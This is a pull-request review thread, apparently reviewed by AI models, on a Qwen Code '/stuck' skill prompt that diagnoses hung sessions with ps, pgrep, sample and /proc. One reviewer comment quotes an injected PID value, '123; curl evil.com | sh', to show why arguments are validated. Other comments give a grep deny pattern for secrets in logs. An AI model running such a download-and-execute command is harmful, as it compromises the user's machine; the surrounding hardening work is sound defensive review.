If the target process's Mach task port is unresponsive (kernel-level hang — exactly the kind of freeze this skill diagnoses), `sample` blocks before its 3-second sampling window even begins. The diagnostic tool itself becomes stuck, and the user can't tell whether they hit a real hang or the tool is just slow.

```suggestion
# macOS: wrap with timeout (15s allows headroom for task port association)
timeout 15 sample <pid> 3 2>&1 || gtimeout 15 sample <pid> 3 2>&1 || sample <pid> 3 2>&1
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 采纳。`sample <pid> 3` 加 `timeout 15` / `gtimeout 15` 兜底（和上轮 lsof 同模式）。target 进程 Mach task port 卡住时不会让诊断本身一起卡。修复在 42c3ca3b。

---
name: stuck
description: Diagnose frozen, stuck, or slow Qwen Code sessions on this machine. Scans for problematic processes, high CPU/memory usage, hung subprocesses, and debug logs. Use /stuck or /stuck <PID> to focus on a specific process.
argument-hint: '[PID or symptom]'

> ---

Reviewer 2: **[Suggestion]** Consider adding an `allowedTools` field to the frontmatter. All other bundled skills (`batch`, `loop`, `qc-helper`, `review`) declare one — even though it's informational-only in v1 (no enforcement), it serves as useful documentation of the skill's tool surface and keeps the convention consistent.

```suggestion
argument-hint: '[PID or symptom]'
allowedTools:
  - run_shell_command
  - read_file
---
```

_— qwen-latest-series-invite-beta-v17 via Qwen Code /review_

Author: Adopted — added `allowedTools: [run_shell_command, read_file]` to match the convention of other bundled skills. Fixed in a5f85e7.

- **Process state `T` (stopped)** — user probably hit Ctrl+Z by accident.
- **Process state `Z` (zombie)** — parent isn't reaping.
- **Very high RSS (>=4GB)** — possible memory leak making the session sluggish.
- **Stuck child process** — a hung `git`, `node`, or shell subprocess can freeze the parent. Check `pgrep -lP <pid>` for each session.

## Investigation steps

1. **List all Qwen Code processes** (macOS/Linux):

   ```
   ps -axo pid=,pcpu=,rss=,etime=,state=,comm=,command= | grep -E '(qwen|node.*qwen|bun.*qwen)' | grep -v grep
   ```

   The `comm` column will be `node` or `bun`, not `qwen`. Filter to rows where the `command` column contains a path related to qwen (e.g., `qwen-code/dist/cli.js`, or a bin symlink ending in `/qwen`).

2. **For anything suspicious**, gather more context:
   - Child processes: `pgrep -lP <pid>`
   - If high CPU: sample again after 1-2s to confirm it's sustained
   - If a child looks hung (e.g., a git command), note its full command line with `ps -p <child_pid> -o command=`
   - Check the session's debug log if you can infer the session ID: `~/.qwen/debug/<session-id>.txt` (the last few hundred lines often show what it was doing before hanging)

>    - The `~/.qwen/debug/latest` symlink points to the most recent session's log

Author: Good catch — fixed in d92021d. The prompt now instructs the model to check `QWEN_RUNTIME_DIR` and `QWEN_HOME` env vars before falling back to the default `~/.qwen/debug/` path.

3. **Consider a stack dump** for a truly frozen process (advanced, optional):
   - macOS: `sample <pid> 3` gives a 3-second native stack sample

>    - Linux: `cat /proc/<pid>/stack` for kernel stack, or `strace -p <pid> -c -f` for syscall profile

Author: Not adopting for now — the prompt already explicitly scopes to macOS/Linux, and the upstream claude-code `/stuck` skill also doesn't cover Windows. The model can adapt on Windows if needed. Will consider adding PowerShell equivalents in a follow-up if there's demand.

>    - Linux: `cat /proc/<pid>/stack` for kernel stack, or `strace -p <pid> -c -f` for syscall profile

Author: Adopted — added `allowedTools: [run_shell_command, read_file]` to match the convention of other bundled skills.

   - This is big — only grab it if the process is clearly hung and you want to know _why_

## Report

Present a structured diagnostic report directly to the user with these sections:

**For each stuck/slow session found:**

- PID, CPU%, RSS (in MB), process state, uptime, full command line
- Child processes and their states
- Your diagnosis of what's likely wrong
- Relevant debug log tail if you captured it
- Stack dump output if you captured it

> - Recommended action (e.g., "safe to kill with `kill <pid>`", "waiting on I/O — check disk", "accidentally stopped — resume with `kill -CONT <pid>`")

Reviewer 2: **[Suggestion]** The "Recommended action" section suggests commands like `kill <pid>`, `kill -CONT <pid>`, etc. While the Notes section at the end says "diagnostic only", the recommended actions here implicitly encourage the model to suggest destructive signals to the user. Consider rephrasing to keep the diagnostic-only boundary clearer — e.g., "Recommended action (for the user to decide)" or adding a note that the model should present these as options, not execute them.

_— qwen-latest-series-invite-beta-v17 via Qwen Code /review_

Author: Good point — rephrased to "Suggested next step for the user to decide" with explicit note "Do not execute these actions yourself — present them as options for the user." Fixed in a5f85e7.

---
name: stuck
description: Diagnose frozen, stuck, or slow Qwen Code sessions on this machine. Scans for problematic processes, high CPU/memory usage, hung subprocesses, and debug logs. Use /stuck or /stuck <PID> to focus on a specific process.
argument-hint: '[PID or symptom]'
allowedTools:
  - run_shell_command
  - read_file
---

# /stuck — diagnose frozen/slow Qwen Code sessions

The user thinks another Qwen Code session on this machine is frozen, stuck, or very slow. Investigate and present a diagnostic report.

## What to look for

Scan for other Qwen Code processes (excluding the current one — exclude the PID you see running this prompt). Since Qwen Code is a Node.js CLI (`#!/usr/bin/env node`), the process name (`comm` column) is always `node` (or `bun` if run with Bun). Identify Qwen Code sessions by looking at the `command` column for paths containing "qwen" (e.g., `node /path/to/qwen-code/dist/cli.js` or a symlinked `qwen` script).

Signs of a stuck session:

- **High CPU (>=90%) sustained** — likely an infinite loop. Sample twice, 1-2s apart, to confirm it's not a transient spike.

> - **Process state `D` (uninterruptible sleep)** — often an I/O hang. The `state` column in `ps` output; first character matters (ignore modifiers like `+`, `s`, `<`).

Reviewer: **[Critical]** macOS 进程不可中断睡眠状态为 `U` 而非 `D`，当前写法会漏掉所有 macOS 上的 I/O 阻塞进程

`D` 是 Linux 的进程状态码，macOS/BSD 使用 `U` 表示不可中断等待。技能标注为 "macOS/Linux" 但未区分平台差异。在 macOS 上按此操作会 grep `D` 而找不到实际状态为 `U` 的 I/O 阻塞进程，诊断报告给出错误的「一切正常」结论。

```suggestion
- **Process state `D` / `U` (uninterruptible sleep)** — often an I/O hang. Linux uses `D`, macOS uses `U`. The `state` column in `ps` output; first character matters (ignore modifiers like `+`, `s`, `<`).
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 已采纳。`man ps` 在 macOS 上确认了 BSD 用 `U` 表示 uninterruptible wait。已改为 `D / U` 并标注两个平台。修复在 72639a0。

- **Process state `T` (stopped)** — user probably hit Ctrl+Z by accident.
- **Process state `Z` (zombie)** — parent isn't reaping.
- **Very high RSS (>=4GB)** — possible memory leak making the session sluggish.
- **Stuck child process** — a hung `git`, `node`, or shell subprocess can freeze the parent. Check `pgrep -lP <pid>` for each session.

> ## Investigation steps

Reviewer: **[Suggestion]** 忽略了代码库已有的 `chats/<sessionId>.runtime.json` sidecar 文件机制

`packages/core/src/utils/runtimeStatus.ts` 已为每个交互式会话写入精确的 `{pid, sessionId, workDir, hostname, startedAt}` 映射——这是为外部工具定位会话而专门设计的。技能完全忽略了这个可靠机制，转而使用脆弱的 `ps | grep` 启发式。建议增加扫描 `.qwen/chats/*.runtime.json` 文件的步骤，交叉验证或替代 `ps` 结果。

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 非常好的指引。已采纳并提升为主路径——新增「Step 1: Enumerate live sessions via the runtime sidecar」，模型先扫 `~/.qwen/projects/*/chats/*.runtime.json` 拿到权威的 (pid, sessionId, workDir) 映射，`ps` 改为 supplementary 用于 enrich CPU/RSS/state。修复在 72639a0。

> 1. **List all Qwen Code processes** (macOS/Linux):

Reviewer: **[Critical]** `ps` 缺少 `-ww` 标志导致输出截断，可能静默漏掉会话

`ps -axo ... command=` 列会被截断到终端宽度（默认 80 列）。类似 `node /Users/longusername/projects/qwen-code/...` 的命令行可能超过 80 字符，如果 "qwen" 部分被截断，`grep` 将不匹配，该会话被静默遗漏。添加 `-ww`（无限宽度，macOS/Linux 均支持）。

```suggestion
   ps -axo pid=,pcpu=,rss=,etime=,state=,comm=,command= -ww | grep -E '(qwen|node.*qwen|bun.*qwen)' | grep -v grep
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 已采纳。加了 `-ww` 标志，并在说明中解释了为什么需要——长 qwen 路径被截断会导致 grep 漏匹配。修复在 72639a0。

   ```
   ps -axo pid=,pcpu=,rss=,etime=,state=,comm=,command= | grep -E '(qwen|node.*qwen|bun.*qwen)' | grep -v grep

>    ```

Reviewer: **[Critical]** PID 参数未经校验直接拼入 shell 命令，存在命令注入风险

`argument-hint: '[PID or symptom]'` 接受用户输入，`<pid>` 被直接拼接到 `pgrep -lP <pid>`、`ps -p <child_pid>`、`sample <pid> 3`、`cat /proc/<pid>/stack`、`strace -p <pid> -c -f` 等命令中，没有任何校验或清理指令。恶意构造的参数（如 `123; curl evil.com | sh`）可能被 LLM 原样嵌入 shell 命令执行。

```suggestion
2. **For anything suspicious**, gather more context:
   - Before using the argument in any shell command, validate that it is a positive integer (PID). If the argument contains shell metacharacters (`$`, `;`, `|`, `&`, `` ` ``, `(`, `)`, etc.), refuse to proceed and tell the user the argument does not look like a valid PID.
   - Child processes: `pgrep -lP '<pid>'`
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 已采纳。增加了显式参数校验段（'## Argument validation'），要求模型在使用参数前确认其为正整数 PID，遇到 shell 元字符直接拒绝。修复在 72639a0。

- **Very high RSS (>=4GB)** — possible memory leak making the session sluggish.
- **Stuck child process** — a hung `git`, `node`, or shell subprocess can freeze the parent. Check `pgrep -lP <pid>` for each session.

## Argument validation

If the user gave an argument, first check whether it is a positive integer (PID). If it contains shell metacharacters (`$`, `;`, `|`, `&`, `` ` ``, `(`, `)`, `<`, `>`, `*`, `?`, backslash, quote, whitespace, etc.), refuse to proceed and tell the user the argument does not look like a valid PID. Treat free-text symptom descriptions as guidance for the report, not as values to substitute into shell commands.

## Investigation steps

1. **Enumerate live sessions via the runtime sidecar (preferred, reliable)**:

   Qwen Code writes a `runtime.json` sidecar for each interactive session at `<runtime-base>/projects/<sanitized-cwd>/chats/<sessionId>.runtime.json`. The default `<runtime-base>` is `~/.qwen` (overridable by `QWEN_RUNTIME_DIR` or `QWEN_HOME`). Each file contains `{schema_version, pid, session_id, work_dir, hostname, started_at, qwen_version}`. Use this as the authoritative source of `(pid, session_id, work_dir)` mappings:

   ```

>    ls -1 ~/.qwen/projects/*/chats/*.runtime.json 2>/dev/null

Reviewer: **[Suggestion]** The sidecar scan is still hardcoded to `~/.qwen`, even though the runtime sidecars are written under `Storage.getRuntimeBaseDir()`. That can be `QWEN_RUNTIME_DIR`, the settings-driven `advanced.runtimeOutputDir`, or the `QWEN_HOME` fallback. With a custom runtime output directory, `/stuck` will skip the authoritative sidecars and may report zero/healthy sessions while the stuck session is elsewhere. Please have the skill resolve the effective runtime base first and scan `<runtime-base>/projects/*/chats/*.runtime.json` instead of only `~/.qwen/projects/...`.

_— gpt-5.5 via Qwen Code /review_

Author: 已采纳（最小化）。在 `<runtime-base>` 描述里加上了 `advanced.runtimeOutputDir` 设置项作为另一个覆盖来源。修复在 e7875ae。

   ```

>    For each file, read it and check whether the recorded `pid` is still alive (`kill -0 <pid>` returns 0). Stale files where the PID is gone mean the session has exited — skip them silently.

Reviewer: **[Suggestion]** `kill -0 <pid>` only proves that some process with that PID currently exists; it does not prove the old sidecar still belongs to a live Qwen session. If the PID was reused after a stale sidecar was left behind, `/stuck` can misclassify an unrelated process as Qwen and produce misleading diagnostics/remediation. After the liveness check, also verify that the current command line still looks like Qwen Code and, when possible, compare the sidecar `started_at` with the process start/elapsed time before treating the record as live.

_— gpt-5.5 via Qwen Code /review_

Author: 部分采纳。完整三重验证（kill -0 + cmdline + started_at 时间戳对齐）相对 sidecar 这一改动本身的收益过重，会显著膨胀 prompt。改为在 sidecar 段加一句：当 step 2 cross-reference 时，若该 PID 的命令行已不像 Qwen Code 进程则跳过——这覆盖了 PID 重用的主要风险，且不需要单独构造 started_at 比较步骤。修复在 e7875ae。

2. **List Qwen Code processes via `ps`** (macOS/Linux) — used to enrich each live session with CPU/RSS/state/uptime, and to catch sessions that may have started before the sidecar feature existed:

   ```

>    ps -axo pid=,pcpu=,rss=,etime=,state=,comm=,command= -ww | grep -E '(qwen|node.*qwen|bun.*qwen)' | grep -v grep

Reviewer: **[Suggestion]** `ps -axo ...` enumerates processes for all users on the machine, and the report later asks for full command lines. On shared macOS/Linux hosts, this can expose another user's Qwen process paths/arguments into the current chat and can lead to advice about sessions the current user does not own. Restrict the scan to the current UID/user, for example by using a current-user `ps` form or by including `uid=`/`user=` and filtering to `$(id -u)` before reporting.

_— gpt-5.5 via Qwen Code /review_

Author: 已采纳。`ps` 加上 `-u "$(id -u)"` 限制为当前用户，多用户主机上不再泄露他人 Qwen 进程信息。修复在 e7875ae。

   ```

   The `-ww` flag disables column truncation — without it, long command paths get cut off and `grep` may miss sessions whose "qwen" path component falls beyond the terminal width. The `comm` column will be `node` or `bun`, not `qwen`. Filter to rows where the `command` column contains a path related to qwen (e.g., `qwen-code/dist/cli.js`, or a bin symlink ending in `/qwen`). Cross-reference with the PIDs from step 1.

3. **For anything suspicious**, gather more context. Substitute `<pid>` only after the validation in "Argument validation" above (or after taking it from `ps` / sidecar output, which is trusted):

>    - Child processes: `pgrep -lP <pid>`

Reviewer: **[Suggestion]** The report asks for child process states, but `pgrep -lP <pid>` only returns PID/name. That means stopped, zombie, or uninterruptible child processes can be missed or under-explained even though child state is one of the main diagnostics. Have the skill follow `pgrep -P <pid>` with a `ps` query for the child PIDs, for example `ps -o pid=,ppid=,pcpu=,rss=,etime=,state=,command= -p <child_pids>`.

_— gpt-5.5 via Qwen Code /review_

Author: 已采纳。把 `pgrep -lP <pid>` 换成 `pgrep -P <pid>` 拿到 child PID 后再用 `ps -p <child_pids> -o pid=,ppid=,pcpu=,state=,etime=,command=` 富化，这样 stopped/zombie/uninterruptible 子进程的状态会出现在诊断输出里。修复在 e7875ae。

   - If high CPU: sample again after 1-2s to confirm it's sustained
   - If a child looks hung (e.g., a git command), note its full command line with `ps -p <child_pid> -o command=`

>    - Check the session's debug log if you can infer the session ID (from the sidecar): `~/.qwen/debug/<session-id>.txt` (the last few hundred lines often show what it was doing before hanging). If `QWEN_RUNTIME_DIR` or `QWEN_HOME` is set, the debug directory is `$QWEN_RUNTIME_DIR/debug/` or `$QWEN_HOME/debug/` instead of the default.

Reviewer: **[Suggestion]** The skill encourages reading and presenting the last few hundred lines of debug logs directly. Those logs can contain prompts, tool outputs, file snippets, paths, or secrets from another session/project, so a diagnostic command can unintentionally copy unrelated sensitive context into the current conversation. Please default to summarizing non-sensitive indicators, redact likely secrets/tokens, and only dump raw log tails when the user explicitly asks for raw logs.

_— gpt-5.5 via Qwen Code /review_

Author: 部分采纳。完整的 summarize-first / explicit-raw-on-request 三段式工作流相对原 prompt 的简洁度过重——upstream claude-code `/stuck` 也直接读后几百行，没有这个保护。改为加一句明确警告：debug 日志可能含其他 session 的 prompts/tokens，只粘贴与卡死直接相关的行，并且决不引用看到的 secrets/API keys。这覆盖了主要的隐私风险，又不会牺牲诊断有效性。修复在 e7875ae。

   - The `~/.qwen/debug/latest` symlink points to the most recent session's log

4. **Consider a stack dump** for a truly frozen process (advanced, optional):
   - macOS: `sample <pid> 3` gives a 3-second native stack sample
   - Linux: `cat /proc/<pid>/stack` for kernel stack, or `strace -p <pid> -c -f` for syscall profile
   - This is big — only grab it if the process is clearly hung and you want to know _why_

## Report

Present a structured diagnostic report directly to the user with these sections:

**For each stuck/slow session found:**

> - PID, CPU%, RSS (in MB), process state, uptime, full command line

Reviewer: **[Suggestion]** `ps ... rss=` reports RSS in kilobytes on both macOS and Linux, but the report asks for RSS in MB. Without an explicit conversion, the skill can report the raw KB value as MB and overstate memory usage by 1024x, causing healthy sessions to look like severe leaks. Please state that `rss=` is KB and must be divided by 1024 before reporting/comparing in MB, or keep the report in KB consistently.

_— gpt-5.5 via Qwen Code /review_

Author: 已采纳。明确说明 `ps` 的 `rss=` 字段在 macOS 和 Linux 上都是 KB，使用前需要 /1024 才能与 4GB 阈值或 MB 单位比较。修复在 e7875ae。

---

# /stuck — diagnose frozen/slow Qwen Code sessions

The user thinks another Qwen Code session on this machine is frozen, stuck, or very slow. Investigate and present a diagnostic report.

## What to look for

Scan for other Qwen Code processes (excluding the current one — exclude the PID you see running this prompt). Since Qwen Code is a Node.js CLI (`#!/usr/bin/env node`), the process name (`comm` column) is always `node` (or `bun` if run with Bun). Identify Qwen Code sessions by looking at the `command` column for paths containing "qwen" (e.g., `node /path/to/qwen-code/dist/cli.js` or a symlinked `qwen` script).

Signs of a stuck session:

- **High CPU (>=90%) sustained** — likely an infinite loop. Sample twice, 1-2s apart, to confirm it's not a transient spike.
- **Process state `D` / `U` (uninterruptible sleep)** — often an I/O hang. Linux uses `D`, macOS/BSD uses `U`. The `state` column in `ps` output; first character matters (ignore modifiers like `+`, `s`, `<`).
- **Process state `T` (stopped)** — user probably hit Ctrl+Z by accident.
- **Process state `Z` (zombie)** — parent isn't reaping.
- **Very high RSS (>=4GB)** — possible memory leak making the session sluggish.

> - **Stuck child process** — a hung `git`, `node`, or shell subprocess can freeze the parent. Check `pgrep -lP <pid>` for each session.

Reviewer: **[Suggestion]** `pgrep -lP <pid>` in the "What to look for" overview is out of sync with step 3.

Step 3 (line ~63) was updated to use `pgrep -P <pid>` followed by `ps -p <child_pids> -o pid=,ppid=,pcpu=,state=,etime=,command=` to capture child process states, but the overview section still references the old `-lP` form — which only shows PID and process name, dropping the state column that the richer pipeline provides. The model reads the overview first and may adopt the simpler (and less informative) command before reaching step 3.

```suggestion
- **Stuck child process** — a hung `git`, `node`, or shell subprocess can freeze the parent. Check `pgrep -P <pid>` (then `ps -p` for state) for each session.
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 完整采纳。"What to look for" overview 改为 `pgrep -P <pid>` 并指向 step 3 拿 state——上一轮升级 step 3 时落下的不一致。修复在 e232ddb4。

## Argument validation

If the user gave an argument, first check whether it is a positive integer (PID). If it contains shell metacharacters (`$`, `;`, `|`, `&`, `` ` ``, `(`, `)`, `<`, `>`, `*`, `?`, backslash, quote, whitespace, etc.), refuse to proceed and tell the user the argument does not look like a valid PID. Treat free-text symptom descriptions as guidance for the report, not as values to substitute into shell commands.

> 

Reviewer: **[Suggestion]** The argument validation lists shell metacharacters but ends with `etc.`, which delegates the completeness of the security boundary to the LLM's judgment. Different models may miss `#` (comment), `!` (history expansion), `~` (home expansion), literal newlines, or other dangerous characters.

```suggestion
A stricter and simpler rule: "If the argument contains any character that is not a digit (0-9), refuse to proceed and tell the user the argument does not look like a valid PID." This is safer than enumerating every possible metacharacter — a valid PID can only be digits.
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 完整采纳，是个净简化。从黑名单 + 'etc.' 改成 '必须全部由数字 0-9 组成' 白名单——更短、更严、不依赖 LLM 自行补全元字符列表。非数字一律降级为 free-text symptom，不进 shell 命令。修复在 abb105fe。

## Investigation steps

1. **Enumerate live sessions via the runtime sidecar (preferred, reliable)**:

   Qwen Code writes a `runtime.json` sidecar for each interactive session at `<runtime-base>/projects/<sanitized-cwd>/chats/<sessionId>.runtime.json`. The default `<runtime-base>` is `~/.qwen` (overridable by `QWEN_RUNTIME_DIR`, `QWEN_HOME`, or the `advanced.runtimeOutputDir` setting). Each file contains `{schema_version, pid, session_id, work_dir, hostname, started_at, qwen_version}`. Use this as the authoritative source of `(pid, session_id, work_dir)` mappings:

>    ```

Reviewer: **[Critical]** The sidecar scan command hardcodes `~/.qwen` and ignores the documented runtime directory overrides (`QWEN_RUNTIME_DIR`, `QWEN_HOME`, `advanced.runtimeOutputDir`). If any override is set, the `ls` command silently finds nothing while `ps` still locates sessions — producing an incomplete/misleading diagnostic. The debug log paths at lines 68/70 have the same problem.

Additionally, when no `runtime.json` files exist (e.g., all sessions predate the sidecar feature), there is no explicit instruction to fall through to step 2 — the LLM may get stuck trying to make the sidecar approach work.

```suggestion
First resolve the actual runtime base directory:

```
RUNTIME_DIR="${QWEN_RUNTIME_DIR:-${QWEN_HOME:-$HOME/.qwen}}"
```

Then use it in all commands:

```
ls -1 "$RUNTIME_DIR"/projects/*/chats/*.runtime.json 2>/dev/null
```

If no runtime.json files are found (empty output or error), note this and proceed directly to step 2 — the `ps` scan is the primary fallback.

Apply the same `$RUNTIME_DIR` resolution to the debug log paths in step 3.
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 完整采纳。这是上一轮的疏漏——我只更新了文字说明，`ls` 命令和 debug 日志路径仍硬编码 `~/.qwen`。已改为：先解析 `RUNTIME_DIR="${QWEN_RUNTIME_DIR:-${QWEN_HOME:-$HOME/.qwen}}"`，sidecar `ls`、debug 日志、`latest` symlink 全部使用这个变量；并加了 sidecar 找不到时显式 fall through 到 step 2 的指令。修复在 abb105fe。

   Note: `ps` reports `rss` in **kilobytes** on both macOS and Linux. Divide by 1024 before comparing to the >=4GB threshold or reporting in MB.

3. **For anything suspicious**, gather more context. Substitute `<pid>` only after the validation in "Argument validation" above (or after taking it from `ps` / sidecar output, which is trusted):
   - Child processes (with state, so a hung `git` / `node` shows up): `pgrep -P <pid>` to get child PIDs, then `ps -p <child_pids> -o pid=,ppid=,pcpu=,state=,etime=,command=` for their state
   - If high CPU: sample again after 1-2s to confirm it's sustained
   - Check the session's debug log if you can infer the session ID (from the sidecar): `~/.qwen/debug/<session-id>.txt` (the last few hundred lines often show what it was doing before hanging). If `QWEN_RUNTIME_DIR` or `QWEN_HOME` is set, the debug directory is `$QWEN_RUNTIME_DIR/debug/` or `$QWEN_HOME/debug/` instead of the default. Debug logs may contain prompts, file contents, or tokens from other sessions — paste only the lines relevant to the hang, and never quote secrets/API keys you happen to see.
   - The `~/.qwen/debug/latest` symlink points to the most recent session's log

> 4. **Consider a stack dump** for a truly frozen process (advanced, optional):

Reviewer: **[Suggestion]** `ps -ww` disables column truncation and shows the full command line — if Qwen Code was launched with credentials passed as CLI arguments (e.g., `--api-key=sk-xxxxx`), those secrets appear in the `ps` output and may end up in the diagnostic report. The report template (line 78) asks for "full command line".

```suggestion
Note: `-ww` shows full command lines which may contain API keys, tokens, or other secrets passed as CLI arguments — redact any secrets as `***` before including command lines in the report.

And in the report template, change "full command line" to "command line (with any secrets redacted)".
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 部分采纳。在 `ps` 段加了一句 note：完整命令行可能包含 CLI-arg credentials（如 `--openai-api-key=sk-…`），引用前 redact 为 `***`。没有动报告模板那一处——保留 'full command line' 语义，通过 redact 警告覆盖密钥风险。修复在 abb105fe。

>    - macOS: `sample <pid> 3` gives a 3-second native stack sample

Reviewer: **[Suggestion]** Step 3 runs unconditionally ("For anything suspicious"), but some process states are self-diagnosing — a process in `T` (stopped) state is almost certainly a Ctrl+Z, and `Z` (zombie) means the parent isn't reaping. For these cases, running child process inspection, debug log reads, and stack dumps adds token cost with no diagnostic value.

Consider adding a short triage sentence at the start of step 3 to skip further investigation when the state alone explains the problem:

```suggestion
3. **For anything suspicious**, gather more context. If the process state alone explains the problem (`T` = accidentally stopped, `Z` = parent not reaping), skip directly to the report — no need for child process or log inspection. Otherwise:
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 完整采纳。Step 3 开头加了 triage 句：状态本身已能解释问题（`T` = stopped、`Z` = zombie）时直接跳到 report，不再做 child/log/stack 检查。修复在 e232ddb4。

   - Linux: `cat /proc/<pid>/stack` for kernel stack, or `strace -p <pid> -c -f` for syscall profile
   - This is big — only grab it if the process is clearly hung and you want to know _why_

## Report

Present a structured diagnostic report directly to the user with these sections:

> **For each stuck/slow session found:**

Reviewer: **[Suggestion]** The instruction "never quote secrets/API keys you happen to see" in debug logs is purely a prompt-level advisory with no enforcement. An LLM can inadvertently paste sensitive lines into the chat. Adding a concrete filtering step before pasting reduces this risk.

```suggestion
Before including any debug log lines in the report, filter them through: `grep -v -iE '(Bearer|sk-|Authorization|secret|token|api.?key|password)'` to strip lines that likely contain credentials.
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 不采纳。理由：(1) `grep -v -iE '(Bearer|sk-|Authorization|secret|token|api.?key|password)'` 的黑名单只覆盖几种常见密钥格式，遇到新前缀（如 `gho_`、`ghp_`、自定义 token）就漏过——容易给开发者一种过滤过了所以安全的虚假安全感。(2) 强制 grep 步骤会让流程更刚性，但模型仍然能看到原始 token 然后用其他方式引用。(3) 当前的 advisory 警告 + UID 过滤已经覆盖主要风险路径。保持现状。

- PID, CPU%, RSS (in MB), process state, uptime, full command line

> - Child processes and their states

Reviewer: **[Suggestion]** `sample <pid> 3` on macOS captures native stack traces including function call arguments. If the process holds API keys, tokens, or other secrets in memory (e.g., passed as arguments to HTTP client library functions), they may appear in the stack dump output. Unlike the debug log section, there is no privacy warning here.

```suggestion
Add a warning similar to the debug log section: "`sample` captures stack traces including function arguments, which may contain API keys or tokens from memory — inspect output before including it in the report and redact any secrets as `***`."
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 完整采纳。`sample` 行加了类似 debug 日志的隐私警告：栈帧可能包含内存中的函数参数（API key/token），写入报告前 redact 为 `***`。修复在 abb105fe。

> - Your diagnosis of what's likely wrong

Reviewer: **[Critical]** `strace -p <pid> -c -f` has two problems:

1. **No timeout**: `-c` collects syscall counts and prints a summary only when the target process exits. For a stuck process (especially in state `D` — the very condition this skill flags as suspicious), `ptrace(PTRACE_ATTACH)` blocks indefinitely. The diagnostic tool itself hangs, which is counterproductive.

2. **Privilege requirement**: Both `strace` and `cat /proc/<pid>/stack` typically need `CAP_SYS_PTRACE` or root. On modern distros with `ptrace_scope=1`, non-root users get "Permission denied" — which could be misdiagnosed as a process symptom.

```suggestion
- Linux: `timeout 10 strace -p <pid> -c -f 2>&1` or `cat /proc/<pid>/stack` for kernel stack
- These commands may require elevated privileges. If they fail with "Permission denied", note it as a permission issue and skip — the failure is not a symptom of the stuck session.
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 采纳，做法是直接把 `strace -p <pid> -c -f` 这一项删掉——claude-code 上游也只有 macOS 的 sample，没有这条 Linux strace。`-c` 会阻塞到目标退出，正好会卡死在它要诊断的进程上；ptrace_scope 又会让它在非 root 下变成权限错误被误诊为进程症状。Linux 留 `cat /proc/<pid>/stack` 即可（只读 procfs，无 ptrace 权限要求）。修复在 abb105fe。

- Relevant debug log tail if you captured it
- Stack dump output if you captured it

> - Suggested next step for the user to decide (e.g., "user may consider `kill <pid>` if the session is unresponsive", "likely waiting on I/O — check disk", "accidentally stopped — user can resume with `kill -CONT <pid>`"). Do not execute these actions yourself — present them as options for the user.

Reviewer: **[Critical]** The report section covers "each stuck session" and "every session looks healthy" but does not address the case where **no sessions are found at all**. If `~/.qwen` is missing or all processes have already exited, the model could wrongly report "N sessions checked, all healthy" when it found zero data.

```suggestion
**If no Qwen Code sessions are found at all**, report: "No live Qwen Code sessions found on this machine. Checked `<runtime-base>` and `ps` output. If you expected a session to be running, it may have already exited (check the terminal or process supervisor)."
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 完整采纳。Report 段加了第三种情况：N=0 时显式说明搜索的 `RUNTIME_DIR` 路径以及 `ps` 当前用户下没有 qwen 相关进程，并提示 session 可能已退出。修复在 abb105fe。

- **Stuck child process** — a hung `git`, `node`, or shell subprocess can freeze the parent. Check `pgrep -lP <pid>` for each session.

## Argument validation

If the user gave an argument, treat it as a PID **only if it consists entirely of digits 0-9**. Anything else — letters, whitespace, punctuation — fails the check, in which case treat it as a free-text symptom description (guidance for the report only, never substituted into shell commands). The strict digit-only whitelist is safer than enumerating shell metacharacters.

## Investigation steps

1. **Resolve the runtime base directory**, then enumerate live sessions via the runtime sidecar (preferred, reliable):

   Qwen Code writes a `runtime.json` sidecar for each interactive session at `<runtime-base>/projects/<sanitized-cwd>/chats/<sessionId>.runtime.json`. The base directory is taken from (in priority order): `QWEN_RUNTIME_DIR`, `QWEN_HOME`, the `advanced.runtimeOutputDir` setting, and finally `~/.qwen`. Use the resolved value in every command below — substituting the literal default would silently miss sessions on machines that override it.

   ```

>    RUNTIME_DIR="${QWEN_RUNTIME_DIR:-${QWEN_HOME:-$HOME/.qwen}}"

Reviewer: **[Suggestion]** Priority order mismatch: prose lists 4 sources but shell command only covers 3

The prose at this line says the runtime base directory is taken from (in priority order): `QWEN_RUNTIME_DIR`, `QWEN_HOME`, the `advanced.runtimeOutputDir` setting, and finally `~/.qwen`. But the shell command immediately below only handles 3 of these:

```bash
RUNTIME_DIR="${QWEN_RUNTIME_DIR:-${QWEN_HOME:-$HOME/.qwen}}"
```

`advanced.runtimeOutputDir` is deferred to a later parenthetical ("ask them or read it from settings"). An LLM skimming the priority list may assume the one-liner is exhaustive and skip the `advanced.runtimeOutputDir` check entirely.

On machines where both `QWEN_HOME` and `advanced.runtimeOutputDir` are configured, the skill would silently use the wrong runtime directory, missing session sidecars and debug logs.

```suggestion
The base directory is taken from (in priority order): `QWEN_RUNTIME_DIR`, `QWEN_HOME`, and finally `~/.qwen`. (If the user has set `advanced.runtimeOutputDir` in `settings.json`, it overrides the env-var resolution — read it from settings and assign to `RUNTIME_DIR` before using the shell commands below.)
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: This review appears to be against an older version of the file. The current preamble (since round 4 / commit 21d419fb) already covers all four sources via a `jq` line for `advanced.runtimeOutputDir` between the `QWEN_RUNTIME_DIR` and `QWEN_HOME` fallbacks:

```
RUNTIME_DIR="${QWEN_RUNTIME_DIR:-}"
[ -z "$RUNTIME_DIR" ] && command -v jq >/dev/null && RUNTIME_DIR=$(jq -r '.advanced.runtimeOutputDir // empty' ~/.qwen/settings.json 2>/dev/null)
RUNTIME_DIR="${RUNTIME_DIR:-${QWEN_HOME:-$HOME/.qwen}}"
```

